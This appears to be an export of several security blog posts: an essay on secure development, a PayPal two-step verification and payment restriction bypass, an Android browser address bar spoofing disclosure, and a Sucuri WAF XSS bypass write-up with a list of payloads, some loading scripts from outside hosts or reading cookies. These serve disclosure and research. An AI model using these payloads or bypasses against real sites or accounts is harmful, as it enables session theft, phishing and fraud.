<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;">As time passes by, we witness a rise in application security attacks, an upward progression in layer of insecurities of the OSI model. In 80 and 90's most of the attacks were related to Layer 1, Layer 2 and Layer 3 of the OSI model, today we are at the point that we have developed a great defense at Network Level, however application layer security remains a big challenge. </span><br />
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;">According to a report by Gartner Research, it states that 75% of the attacks today occur at the application layer of the OSI Model.</span> According to a survey by Trustwave, 82% of web applications are vulnerable to XSS attacks. According to another survey, 80% of all the security incidents in the financial sector occur due to Cross-site Scripting. Therefore, building defense at application layer is mandatory.</div>
<div rtenodeid="4" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<h4>
Application Layer Defenses/Approach</h4>
</div>
<div rtenodeid="4" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;">Overtime, there have been multiple defenses and approaches established at application level, most notable being a "<b>Web Application Firewall</b>" and "<b>Runtime Application Self-Protection</b>" so on and so forth. </span><br />
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;">A Web Application firewall could be used as an additional layer of security, however all WAF's rely upon Blacklist i.e. Reject Known Bad, as whitelisting mode is not practically applicable in the real world (it's not easy to implement). This can be largely attributed to the fact that the majority of web applications are dynamic, and it is very difficult to predict all the possible inputs in order to write a whitlelist of what is allowed. The blacklist, however is not really effective, and this has been proven in past. As a matter of fact, Bypassing WAF's is my day-to-day job and back in 2013, I had written a cheatsheet "<b><a href="http://www.rafayhackingarticles.net/2013/12/bypassing-modern-wafs-xss-filters-cheat.html" target="_blank">Bypassing Modern WAF's XSS Filters</a></b>" for bypassing Web Application firewalls in which I had written bypasses for top Web Application firewalls. </span><br />
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;"><b>Runtime Application Self Protection </b>is relatively a new approach for preventing application layer attacks, which empowers the application to protect in against attacks in real time. A RASP sits at each junction point of the application such as between the application and database, the file system and the network, it sits there and identifies & blocks any malicious activity, enabling the application an ability to protect itself. The problem, however, with this solution is that it still is based upon a blacklist, it is very costly and requires a lot of time to mature itself. </span><br />
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;">“<b>The cost of removing an application security vulnerability during the design phase ranges from 30-60 times less than if removed during production.</b>”- NIST, IBM, and Gartner Group</span><br />
<div style="font-family: calibri, arial, helvetica, sans-serif; font-size: 16px;">
<br /></div>
<div style="font-family: calibri, arial, helvetica, sans-serif; font-size: 16px;">
Bottom line is that,<strong> You cannot write a vulnerable code and rely upon WAF, </strong><span rtenodeid="28" style="font-size: 12pt;"><strong>RASP and other protection mechanisms to protect your application. </strong></span></div>
</div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<h4>
Secure SDLC </h4>
</div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<div style="font-family: calibri, arial, helvetica, sans-serif;">
</div>
<div style="font-family: calibri, arial, helvetica, sans-serif; line-height: 150%;">
<span style="font-family: "calibri" , sans-serif;">The defenses we talked
about above do help in improving our security model. However, in my opinion, it
is the wrong way of solving the problem. The best approach is that the application
should itself carry the ability to protect itself and henceforth, be built with
security in mind from day one. Experts recommend that security should
be embedded into all stages of SDLC i.e. Requirements gathering, Design,
Development, Testing, Implementation.<o:p></o:p></span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGbEAeNKP7XHILn-z7ORH96L3slN72Ton7hfCl_6sUDloiK0SGuLO5kaX01Oeb6qFwrPDYUYxM0TILQDUn80ri57FzSFF22LEgpqj2utddMTNFl7AWZQUxhPjlNiwZqvU-rcR0Hz-Zggg/s1600/600px-Security_in_the_SDLC_Process.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="370" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGbEAeNKP7XHILn-z7ORH96L3slN72Ton7hfCl_6sUDloiK0SGuLO5kaX01Oeb6qFwrPDYUYxM0TILQDUn80ri57FzSFF22LEgpqj2utddMTNFl7AWZQUxhPjlNiwZqvU-rcR0Hz-Zggg/s640/600px-Security_in_the_SDLC_Process.png" width="640" /></a></div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
Let's talk about how security could fit into all stages of SDLC:</div>
<div rtenodeid="38" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<br rtenodeid="39" /></div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<strong>i) Requirements</strong></div>
<div rtenodeid="41" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<div style="line-height: 150%;">
<span style="font-family: "calibri" , sans-serif;"><br /></span></div>
<div style="line-height: 150%;">
<span style="font-family: "calibri" , sans-serif;">The first phase of SDLC is
the "Requirement" in which project scope and goals are set.
In this phase, OWASP recommends the establishment of security
requirements of the application. The requirements of the customer should be
checked in accordance with the security standards such as the password
policies, secure network protocols etc. <o:p></o:p></span></div>
</div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<br /></div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<strong>ii) Design </strong></div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<div style="line-height: 150%;">
<span style="font-family: "calibri" , sans-serif;">In the design phase, OWASP
recommends the building of design with security in mind. This involves what is
known as <span style="background: white;">Threat modelling, which is
an approach that involves analyzing the security of an application in
order to mitigate the threats which yields the security plan. The
following is a great presentation on how threat modelling should be
performed. </span><o:p></o:p></span></div>
<div style="line-height: 150%;">
<br /></div>
</div>
<iframe allowfullscreen="" frameborder="0" height="360" src="https://www.youtube.com/embed/ZtSrcq7gscE" width="577"></iframe>
<br />
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<strong><br /></strong></div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<strong>iii) Development </strong></div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<div style="line-height: 150%;">
<br /></div>
<span style="font-family: "calibri" , sans-serif; line-height: 150%;">In Development phase, OWASP
recommends developers to follow "Secure Coding Standards" for which,
the organization must conduct an awareness on Secure Coding for developers,
because guidelines are often overlooked by developers. Apart from that
Source code, reviews must by done by internal team. It is also recommended
to have this conducted via third party to mitigate additional findings.</span><br />
<strong><br /></strong>
<strong>iv) Testing </strong></div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<div style="line-height: 150%;">
<br /></div>
<div style="line-height: 150%;">
<span style="font-family: "calibri" , sans-serif;">In testing phase, OWASP
recommends performing a penetration test including infrastructure assessment,
in order to counter verify if the findings present inside the design and
development phase have been properly fixed. Both Static and Dynamic code
analysis should be thoroughly performed. <o:p></o:p></span></div>
<div style="line-height: 150%;">
<br /></div>
<div style="line-height: 150%;">
<span style="font-family: "calibri" , sans-serif;">Special attention should be
paid to Business logic bugs which cannot be otherwise found by automated
scanners as the business logic varies for every application. Efforts made in
second phase i.e. Design could reduce the number of business logic bugs
significantly. <o:p></o:p></span></div>
<br />
<div style="line-height: 150%;">
<br /></div>
<strong>v) Deployment </strong></div>
<div style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px;">
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;">Deployment is a phase where your application goes from development into production environment. In this phase, OWASP recommends securely conducting the migration process from development phase to production phase and to ensure that post production security requirements are met.</span><br />
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif;">In case you would like to learn more about Secure SDLC, I would recommend the following presentation -</span><span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif; font-size: 16px;"> "</span><strong style="font-family: calibri, arial, helvetica, sans-serif; font-size: 16px;"><a href="https://www.owasp.org/images/7/76/Jim_Manico_(Hamburg)_-_Securiing_the_SDLC.pdf" target="_blank">Secure Development Lifecycle</a></strong><span style="font-family: "calibri" , "arial" , "helvetica" , sans-serif; font-size: 16px;">".</span></div>
<div rtenodeid="74" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px; text-decoration: underline;">
<strong style="line-height: 150%;"><span style="font-family: "calibri" , sans-serif;"><br /></span></strong>
<strong style="line-height: 150%;"><span style="font-family: "calibri" , sans-serif;">Security is an ongoing
process, no specific requirement has to be met for 100% security. </span></strong></div>
<div rtenodeid="76" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 16px; text-decoration: underline;">
<br />
<div style="line-height: 150%;">
<span style="font-family: "calibri" , sans-serif;">It should be noted that even
after introducing security in every process of SDLC, 100% security cannot be
achieved. However, the threat probability could be reduced. As security
analysts, we have to close a 100 doors from which an attacker could enter and
as an attacker, s/he only needs one door. The fact that appeals most to
me about this approach is that it's proactive, not reactive which is how most
of the application development nowadays is done. <u style="text-decoration: underline;"><o:p></o:p></u></span></div>
</div>
</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/secure-application-development-and.html";
</script>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com1tag:blogger.com,1999:blog-3121270199089759062.post-41595455584302959692015-09-25T12:03:00.001-07:002020-05-27T14:31:22.179-07:00Paypal Mobile Verification And Payment Restrictions Bypass<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwx__fqv5aWdGKChPheO0chyQTXinqO6xMMubuXbYIrQD-q7a_e4rKhSe1wGjaXMETBULHiIJclSVWvlUC_VA6PdsgjpzJrbTXfxU1B-16xqhyphenhyphenFwyVtFvR-O53UjdyLmT5RkfkXmiPvM0/s1600/download.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwx__fqv5aWdGKChPheO0chyQTXinqO6xMMubuXbYIrQD-q7a_e4rKhSe1wGjaXMETBULHiIJclSVWvlUC_VA6PdsgjpzJrbTXfxU1B-16xqhyphenhyphenFwyVtFvR-O53UjdyLmT5RkfkXmiPvM0/s400/download.jpg" width="400" /></a></div>
<br />
In this post, i would like to share a very simple logic flaw I found earlier this year I have found a way to circumvent mobile verification by utilizing a different portal for logging into a paypal account. The flaw lies in the fact that paypal does not perform two step verification/authorization checks on all different portals that are used to log into a paypal account. Ideally, there should be a centralized authentication mechanism to authenticate the user or else additional authorization checks have to be applied to all different portals that are used to log into paypal ccount.<br />
<a name='more'></a><br />
In this case, We could use the mobile activation page to log into the paypal account without happen to use a mobile phone.<br />
<br />
<b><a href="https://www.paypal.com/us/cgi-bin/?cmd=_mobile-activate-outside">https://www.paypal.com/us/cgi-bin/?cmd=_mobile-activate-outside</a></b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir-7TWMEWvg6kSY_NSHudl5yr4Q6UlhaMfyFfGsEIvKS9gx4PxwYJRoiftz4K9ctI-ztu7_U4XnNftEoqGvbWXUAtAwc26RZy3mTLL6oSbXd8D-4w8P4km3c3_ZPBXP5IM_pMOFvjzVyk/s1600/sss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="572" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir-7TWMEWvg6kSY_NSHudl5yr4Q6UlhaMfyFfGsEIvKS9gx4PxwYJRoiftz4K9ctI-ztu7_U4XnNftEoqGvbWXUAtAwc26RZy3mTLL6oSbXd8D-4w8P4km3c3_ZPBXP5IM_pMOFvjzVyk/s640/sss.png" width="577" /></a></div>
<br />
<h4>
Demonstration</h4>
<iframe allowfullscreen="" frameborder="0" height="281" mozallowfullscreen="" src="https://player.vimeo.com/video/140455516" webkitallowfullscreen="" width="500"></iframe> <br />
<br />
Unfortunately, the bug was marked as duplicate so it was not eligible for a bounty, however that really doesn't matter as the fun and the learning is more important. However, there are still other ways to circumvent mobile verification, however i did not wish to report.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQDJXM-J65SHpf1O_bS0Jx92J6HhobNsnK8XgDs46tW6_QhfOiT9Ut5-OsLeDw0WXVs3JldfefmFu8r4TVIIE3Y5eXhuyaaYFCQZMuib6klwmmedIQypzKUXjJJSceVZFJuce869smvmE/s1600/fix.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQDJXM-J65SHpf1O_bS0Jx92J6HhobNsnK8XgDs46tW6_QhfOiT9Ut5-OsLeDw0WXVs3JldfefmFu8r4TVIIE3Y5eXhuyaaYFCQZMuib6klwmmedIQypzKUXjJJSceVZFJuce869smvmE/s640/fix.png" style="cursor: move;" width="577" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<h4>
Bypassing Payment Restrictions</h4>
<div class="separator" style="clear: both; text-align: left;">
After you have bypassed paypal might restrict you from transferring funds to another account, however there is a simple way of bypassing it as well, all you have to do is to create a donation button or any other payment button from paypal and directly use that to transfer money, paypal does not enforce any restriction on it.</div>
<h4>
Example</h4>
<b><a href="https://www.paypal.com/id/cgi-bin/webscr?cmd=_flow&SESSION=OvGwImW-aZGi7_Jf-oBOYlXFljX6KfnUMxeUoxyow7Woq8ZZYb7SihFpKQy&dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198d1a93361f052308ac20c1249d8113f4c">https://www.paypal.com/id/cgi-bin/webscr?cmd=_flow&SESSION=OvGwImW-aZGi7_Jf-oBOYlXFljX6KfnUMxeUoxyow7Woq8ZZYb7SihFpKQy&dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198d1a93361f052308ac20c1249d8113f4c</a></b></div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/paypal-mobile-verification-and-payment.html";
</script>Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com4tag:blogger.com,1999:blog-3121270199089759062.post-18589065608727154472015-05-18T11:14:00.000-07:002020-05-27T14:32:05.105-07:00Android Browser All Versions - Address Bar Spoofing Vulnerability - CVE-2015-3830<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi77BGdp91mBfEE1FbYxZxc2C0U21ZgvytwpN8GsOSW1K80qvut4flgi1JBRY1bm_1X1qzRHXSjbUp-xsf5huiITwEW_MYmwEaNHM04a3aLTQPpo7duFIgpGbnboe7r48-ZWK0GkE2w5ns/s1600/email-spoofing.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi77BGdp91mBfEE1FbYxZxc2C0U21ZgvytwpN8GsOSW1K80qvut4flgi1JBRY1bm_1X1qzRHXSjbUp-xsf5huiITwEW_MYmwEaNHM04a3aLTQPpo7duFIgpGbnboe7r48-ZWK0GkE2w5ns/s320/email-spoofing.jpg" width="320" /></a></div>
<h4>
Introduction</h4>
<div class="separator" style="clear: both; text-align: left;">
Google security team themselves <a href="https://www.google.com/about/appsecurity/reward-program/" rel="nofollow" target="_blank">state that</a> "We recognize that the address bar is the only reliable security indicator in modern browsers" and if the only reliable security indicator could be controlled by an attacker it could carry adverse affects, For instance potentially tricking users into supplying sensitive information to a malicious website due to the fact that it could easily lead the users to believe that they are visiting is legitimate website as the address bar points to the correct website. </div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<a name='more'></a><br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<h4>
Android Stock Browser Address Bar Spoofing</h4>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
Few months ago i discovered an address bar spoofing vulnerability affecting Android Stock Browser on all Android versions. The tests were carried out on Android Lollipop and later were confirmed on prior versions. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The issue is caused due to the fact that the browser fails to handle 204 error "No Content" responses when combined with window.open event and therefore allowing us to spoof the address bar.</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<h4>
Steps To Reproduce</h4>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<b>1)</b> Visit <a href="http://jsfiddle.net/dy4swq4o/show/" rel="nofollow" target="_blank">http://jsfiddle.net/dy4swq4o/show/</a> with Unpatched Android Stock Browser.</div>
<div class="separator" style="clear: both;">
<b>2)</b> click the "Click here to be redirected" button</div>
<div class="separator" style="clear: both;">
<b>3) </b>Android browser will open a new tab with the browser pointing to "<b>http://www.google.com/csi</b>" in the address bar, which makes the victim believe that they are infact visiting a legitimate website, however in reality the page is not hosted on google.com. </div>
<div class="separator" style="clear: both;">
<b>4) </b>As soon as the victim enters his/her credentials, they are sent to <b>attacker.com</b>. </div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<b>Note: Please visit <a href="https://jsfiddle.net/dy4swq4o/" rel="nofollow" target="_blank">https://jsfiddle.net/dy4swq4o/</a> for unrendered version of the POC.</b></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<h4>
Proof of Concept</h4>
<div class="separator" style="clear: both; text-align: left;">
The following is a screenshot of Samsung Galaxy S5 running latest android stock browser, as you may notice that the address bar points to https://www.google.com/csi (Which returns a 204 response), which makes the user believe that he is infact visiting a legitimate site however it's hosted on attacker's domain name. </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_agLNt89vQ3mwb6wNhNysw-162R4b0d1E6QmCEFbwxJzrCi0Rt7DUBkNegDutZRNAHOoocsRVJLBQznb4Tc_HeNq5yShBQOHG3eqkln92hSBuNVjz0p2JM_j6Kj2PknNLWgXI6BcqyjM/s1600/jaaaaan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_agLNt89vQ3mwb6wNhNysw-162R4b0d1E6QmCEFbwxJzrCi0Rt7DUBkNegDutZRNAHOoocsRVJLBQznb4Tc_HeNq5yShBQOHG3eqkln92hSBuNVjz0p2JM_j6Kj2PknNLWgXI6BcqyjM/s640/jaaaaan.png" width="352" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<i>Notes: Joe Vennix suggests that you might have to play with my timeout value , and he found 1500 - 2000 to work much more consistently. This issue is due to the fact that, In case if the timeout fires too soon (before the NO CONTENT response is received from gmail.com), the new page will just have a blank URL bar.</i></div>
<br />
<h4>
Credits</h4>
The proof of concept was initially created by me, however it was later modified and improvised by "<b>Joe Vennix</b>". I would like to sincerely thank "<b>Tod Beardsley</b>" from Rapid7 team for handling the disclosure for me. Kudos!<br />
<br />
<h4>
Mitigation</h4>
The Android security team has responded by releasing patches committed to both Kitkat and Lollipop main distributions. Users are advised to contact their carriers to determine if they have received updated versions of these operating systems."<br />
<h4>
Disclosure Timeline</h4>
Feb 09, 2015: Reported to security@android.com by Rafay Baloch<br />
Mar 26, 2015: Disclosed to Rapid7 and Joe Vennix Wed<br />
Apr 01, 2015: Proof of Concept improved by Joe Vennix Fri<br />
Apr 03, 2015: Reported to security@android.com and CERT/CC by Rapid7 Tue<br />
Apr 07, 2015: Vendor responds, patch availabile on Lollipop Thu<br />
Apr 30, 2015: Vendor responds, patch availabile on KitKat Mon<br />
May 18, 2015: Public disclosure </div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/android-browser-all-versions-address.html";
</script>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com5tag:blogger.com,1999:blog-3121270199089759062.post-85598868305475037842015-04-25T07:10:00.000-07:002020-05-27T14:32:24.135-07:00Sucuri WAF XSS Filter Bypass<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizlRR64UpfjBfMIK1sy4x-_qOXnq-OKEawI_s1I41HCjrUnzzGea7E-zDl0TyOtGCo8giBVfQJR_iD4_Os4H-uEYShIjtFBXzAg8JsdUT-fuMq9j8bfnuUXvLw4Y1Ni_koqqm9kGZv-EM/s1600/waf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizlRR64UpfjBfMIK1sy4x-_qOXnq-OKEawI_s1I41HCjrUnzzGea7E-zDl0TyOtGCo8giBVfQJR_iD4_Os4H-uEYShIjtFBXzAg8JsdUT-fuMq9j8bfnuUXvLw4Y1Ni_koqqm9kGZv-EM/s1600/waf.png" height="220" width="320" /></a></div>
<h4>
Introduction</h4>
<b>Sucuri Cloud Proxy</b> is a very well known WAF capable of preventing DOS, SQL Injection, XSS and malware detection and prevention. It acts as a reverse proxy which means that all the traffic sent to an application behind Sucuri WAF would be first sent to Sucuri's network which (based upon it's signature database) would check if a particular request is legitimate or not, if it's legitimate it would let it reach the application otherwise it would blocked.<br />
<br />
Due to the fact that Sucuri's Cloud proxy utilizes a Blacklist based protection to prevent application layer attacks, it caught my interest as it has been proven <a href="http://www.rafayhackingarticles.net/2013/12/code-igniter-xss-filter-multiple.html" rel="nofollow" target="_blank">time after time </a>that blacklist based protection is insufficient when attempting to block application layer attacks specifically Cross site scripting, as there are countless ways javaScript could be encoded/represented to bypass the protection and thereby it's very difficult to construct a filter that is capable of blocking all possible combinations while yielding minimum false positives. An example would be Mod Security, they have a Strong XSS filter, However it generates a lot of false positives and in most cases it blocks normal/harmless text.<br />
<a name='more'></a><h4>
Example #1</h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1QzcIGdR6uEiG2n34DxXYCPhvMpUlQ_KOTMjMK5t-0G5AslnK466vzcE9O0RvEcnm0wCQsM38IVjzZteto2AOCGnVkCFHP4K2b4pvaNdwyEdB6GrDTnAobyq__kadx_MibL-A-zvSaR8/s1600/securi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1QzcIGdR6uEiG2n34DxXYCPhvMpUlQ_KOTMjMK5t-0G5AslnK466vzcE9O0RvEcnm0wCQsM38IVjzZteto2AOCGnVkCFHP4K2b4pvaNdwyEdB6GrDTnAobyq__kadx_MibL-A-zvSaR8/s1600/securi.png" height="336" width="577" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As you can see fr that a completely harmless text triggers an alert, as the regular expression is checking for any thing before and after "src" attribute. </div>
<h4>
Example 2 </h4>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxarCfbDhfHydXt45C2bkCuA8-dbn4PdRH8nEga2rEOCeb5VP4AROQDA7LtKfazpDYMBKx9CNbPHaH8VRUCKeZskQlf1i-pFNr34VHkb4951Sk4W9qErl7KQ3vnC3RnMx8GkkFD3RR-UM/s1600/ttp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxarCfbDhfHydXt45C2bkCuA8-dbn4PdRH8nEga2rEOCeb5VP4AROQDA7LtKfazpDYMBKx9CNbPHaH8VRUCKeZskQlf1i-pFNr34VHkb4951Sk4W9qErl7KQ3vnC3RnMx8GkkFD3RR-UM/s1600/ttp.png" height="382" width="577" /></a></div>
<br />
Notice that in this case as well we have a valid and completly harmless text being considered as an XSS attack vector.<br />
<h4>
Sucuri XSS Filter</h4>
Let's get to the main topic, In this post i would be revealing one of the many bypasses i found for sucuri's XSS filter. The full bypass works with user interaction, however given that you follow the given <a href="http://www.rafayhackingarticles.net/2013/12/bypassing-modern-wafs-xss-filters-cheat.html" rel="nofollow" target="_blank">methodology</a> you would easily be able to construct a bypass that does not require user interaction.<br />
<br />
As per the following <a href="http://cloudproxy.sucuri.net/cross-site-script-protection" target="_blank">link</a> Sucuri's cloud proxy has a built in XSS filter capable of detection and blocking XSS attempts. "<u><b>Our CloudProxy firewall does protect your site against XSS script injections if you want to prevent them from ever being used to compromise your site</b></u>". So I decided to test the effectiveness, however due to absence of testbed i had to attempt it on a live website. So let's get started.<br />
<h4>
Methodology</h4>
The following is the methodology I utilize when i am up against any WAF:<br />
<br />
<b>i)</b> Brute Force (Throwing random payloads and known bypasses for other filters to see if they are able to bypass the filter)<br />
<b>ii)</b> Regex Reversing (The rules are reverse engineered to see what is allowed vs what is not allowed to construct a bypass)<br />
<b>iii) </b>Browser Bugs (When (i) and (ii) fails, I go with browser specific bugs such as charset inheritance, RPO etc and other quirks)<br />
<br />
For bypassing Sucuri the second methodology was utilized i.e. Regular expression reversing.<br />
<h4>
Initial Tests - Brute Force </h4>
I made initial tests with tons of different vectors, however i quickly figured out that Brute forcing would not be the way to go about bypassing this filter.<br />
<br />
<script>alert(0);</script><br />
<scrIpt>prompt(0);</script><br />
<script/src="http://test.com/evil.js"><br />
<script>delete alert;alert(1)</script><br />
<svg><script/href=//?? /> - IE<br />
<script src="https://www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1"><br />
</script<br />
<svg><script/href= /><br />
<script>confirm(0);</script><br />
<iframe src="javascript:alert(2)"<br />
<form><isindex formaction="javascript&colon;confirm(1)><br />
<embed/code=//goo.gl/nlX0P?<br />
<embed/src=//goo.gl/nlX0P><br />
<object/data=//goo.gl/nlX0P><br />
<isindex action=//goo.gl/nlX0P type=image><br />
<form action=//goo.gl/nlX0P><input type="submit"><br />
<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P"><br />
<applet code="javascript:confirm(document.cookie);"><br />
<iframe/src="data:text/html,<iframe/src=http://jsfiddle.net/d7Xu7/1/>"><br />
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)<br />
type=image><br />
<isindex x="javascript:" onmouseover="alert(1)"><br />
<h4>
Constructing A Bypass - Regex Reversing</h4>
During my tests i found that <a tag along with href attribute was allowed. However i found that as soon as i enter anything after the = my vector is blocked.<br />
<br />
<b>http://www.site.com/shop.php?c=4<span style="color: red;">"><a href=http://www.google.com>CLICK</a></span></b><br />
<b><span style="color: red;"><br /></span></b>
I thought perhaps they are detecting the regular expressions expects a SPACE after anchor tag, so i tried forward slash (/) however it was blocked.<br />
<br />
<b>http://www.site.com/shop.php?c=4<span style="color: red;">"><a/href=http://www.google.com>CLICK</a></span></b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgllKsCVGeSe1eCEvSZdJ6yL__yhyvi-SC2dYUXzo2ZeUl5ifB4QMK8IjhvF2IckdJBlu0dW5l7l-iz7Te8YeD0Ub2nQGHKv7ZaSIqu5Em-PahA1IY2noAM6PTKhjUyPEc8iAHiuVckar4/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgllKsCVGeSe1eCEvSZdJ6yL__yhyvi-SC2dYUXzo2ZeUl5ifB4QMK8IjhvF2IckdJBlu0dW5l7l-iz7Te8YeD0Ub2nQGHKv7ZaSIqu5Em-PahA1IY2noAM6PTKhjUyPEc8iAHiuVckar4/s1600/1.png" height="283" width="577" /></a></div>
<br />
<br />
The next option was to try characters that could be used instead of white space such as x0c which stands for "Form Feed" or perhaps newlines.<br />
<b>http://www.site.com/shop.php?c=4<span style="color: red;">"><a%0c href=http://www.google.com>CLICK</a></span></b><br />
<div>
<br /></div>
I came to the conclusion that the regex only looks for a "<b>Space</b>" and "<b>Forward slash</b>" between a tag and href attribute. However, i since Form feed only works in google chrome, i didn't wanted to generate a browser specific bypass. So, i used the following vector.<br />
<div>
<br /></div>
<div>
<b>http://www.site.com/shop.php?c=4<span style="color: red;">"><a fooooooooooooooooooooooooooo href=http://www.google.com>CLICK</a></span></b></div>
<div>
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
